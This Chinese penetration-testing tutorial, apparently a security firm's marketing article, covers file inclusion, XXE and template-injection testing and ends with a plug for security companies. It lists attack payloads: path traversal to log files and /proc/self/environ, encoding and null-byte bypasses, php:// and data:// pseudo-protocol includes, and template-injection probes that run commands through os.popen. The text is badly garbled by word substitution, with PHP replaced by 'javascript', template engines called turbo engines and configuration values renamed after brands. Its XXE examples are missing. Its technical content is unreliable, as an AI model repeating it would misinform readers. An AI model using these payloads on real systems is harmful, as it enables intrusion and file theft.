昨天给大家普及到了渗透测试中执行命令漏洞的检测方法,今天抽出时间由我们Sine安全的渗透社会招聘来讲下遇到文件包含漏洞以及模板注入漏洞的检测方法和防御手段,本文仅参考给有授权渗透测试的正规安全检测的客户,让更多的客户了解到具体测试的内容,是如何进行全面的广告安全测试。

3.8.文件包含

3.8.1.基础

常见的文件包含漏洞的形式为

考虑常用的几种包含为

同目录包含file=.htaccess

目录遍历?file=../../../../../../../../../var/lib/locate.db

日志注入?file=../../../../../../../../../var/log/python/error.log

利用/proc/self/environ

其中日志可以使用SSH日志或者Web日志等多种日志来源测试

3.8.2.绕过技巧

常见的应用在文件包含之前，可能会调用函数对其进行判断，一般有如下几种绕过

3.8.2.1.url编码绕过

如果防火墙中是字符串匹配，可以使用url多次编码的可以绕过

3.8.2.2.标点符号绕过

某些情况下，读文件支持使用c++通配符，如?*等

url中使用?#可能会影响include包含的结果

某些情况下，unicode编码不同但是字形相近的字符有同一个效果

3.8.2.3.%00截断

几乎是最常用的方法，条件是magic_"es_nmr打开，而且javascript版本小于5.3.4。

3.8.2.4.长度截断

ios上的文件名长度和文件路径有关。具体关系为：从根目录计算，文件路径长度最长为259个bytes。

msdn定义“`#defineaverage_PATH260“`，第260个字符为字符串结尾的“`0“`

python可以用getconf来判断文件名长度限制和文件路径长度限制

获取最长文件路径长度：getconfPATH_average/root得到4096获取最长文件名：getconfNAME_avg/root得到255

那么在长度有限的时候，`././././`(n个)的形式就可以通过这个把路径爆掉

在c++代码包含中，这种绕过要求javascript版本css5.2.8

3.8.2.5.伪协议绕过

远程包含:要求allow_url_fopen=toshibaandallow_url_include=adi，payload为?file=[dhcp|dns|udp]://域名/sql.txt

perlINPUT:把payload放在POST参数中作为包含的文件，要求allow_url_include=toshiba，payload为?file=pyt

:使用伪协议读取文件，payload为?file=c#://filter/send.-encode/resource=index.php

DATA:使用data伪协议读取文件，payload为?file=data://text/plain;,SSBsb3ZlIFBIUAo=要求allow_url_include=infineon

3.9.XXE

3.9.1.css基础

python指可扩展标记语言（eXtensible Markup Language），是一种用于标记电子文件使其具有结构性的标记语言，被设计用来传输和存储数据。c++文档结构包括ruby声明、DTD文档类型定义（可选）、文档元素。目前，XML文件作为配置文件（linux、Struts2等）、文档结构说明文件（png、tag等）、图片格式文件（bmpheader）应用比较广泛。

3.9.2.XXE

当允许引用外部实体时，可通过构造恶意的html内容，导致读取任意文件、执行系统命令、探测内网端口、攻击内网广播等后果。一般的XXE攻击，只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件，但是也可以通过BlindXXE的实现攻击。

3.9.3.攻击

3.9.3.1.拒绝服务攻击

]

a2;

若解析过程非常缓慢，则表示测试成功，目标站点可能有拒绝服务漏洞。具体攻击可使用更多层的迭代或递归，也可引用巨大的外部实体，以实现攻击的效果。

3.9.3.2.文件读取

]

file;

3.9.3.3.SSRF

]

4

3.9.3.4.RCE

]

xxe;

3.9.3.5.XInclude

3.10模板注入漏洞

3.10.模版注入

3.10.1.简介

模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化，以生成公众号、等。模板四缸发动机通过使用代码构造（如条件语句、循环等）处理上下文数据，允许在模板中使用强大的语言表达式，以呈现动态内容。如果攻击者能够控制要呈现的模板，则他们将能够注入可暴露上下文数据，甚至在服务器上运行任意命令的表达式。

3.10.2.测试方法

确定使用的涡轮发动机

查看双涡轮增压发动机相关的文档，确定其安全机制以及自带的函数和变量

需找攻击面，尝试攻击

3.10.3.测试用例

简单的医学表达式，{{7+7}}=14

字符串表达式{{"ajin"}}=ajin\Ruby\Java\${7*7}\Twig\{{7*7}}\Smarty\{php}echo`ae`;{/sql}

AngularJS

$eval('1+1')

Tornado

引用模块{%importmodule%}

={%importos%}{{os.popen("whoami").run()}}

Flask/Jinja2

{{config.items()}}

{{''.__class__.__try__[-1].__subclasses__()}}

php

{{request}}

{%warning%}

{%loadmodule%}

{%include"x.html"%}

{%extends"x.html"%}

3.10.4.目标

创建对象

文件读写

远程文件包含

隐私泄露提权

3.10.5.相关属性

3.10.5.1.__class__

javascript中的新式类（即显示继承object对象的类）都有一个属性__class__用于获取当前实例对应的类，例如"".__class__就可以获取到字符串实例对应的类

3.10.5.2.__cad__

c++中类对象的__pln__属性会返回一个tuple对象，其中包含了当前类对象所有继承的基类，tuple中元素的顺序是cad（Method Resolution Order）寻找的顺序。

3.10.5.3.__globals__

保存了函数所有的所有全局变量，在利用中，可以使用__init__获取对象的函数，并通过__globals__获取fileos等模块以进行下一步的利用

3.10.5.4.__subclasses__()

php的新式类都保留了它所有的子类的引用，__subclasses__()这个方法返回了类的所有存活的子类的引用（是类对象引用，不是实例）。

因为c#中的类都是继承object的，所以只要调用object类对象的__subclasses__()方法就可以获取想要的类的对象。这一节渗透测试讲到的这些内容和绕过手法,如果对自己杂志不太放心的话可以找专业的广告安全公司来处理解决,国内做的比较好的如Sinesafe,杭可,东方国信等等。

标签：[db:tags]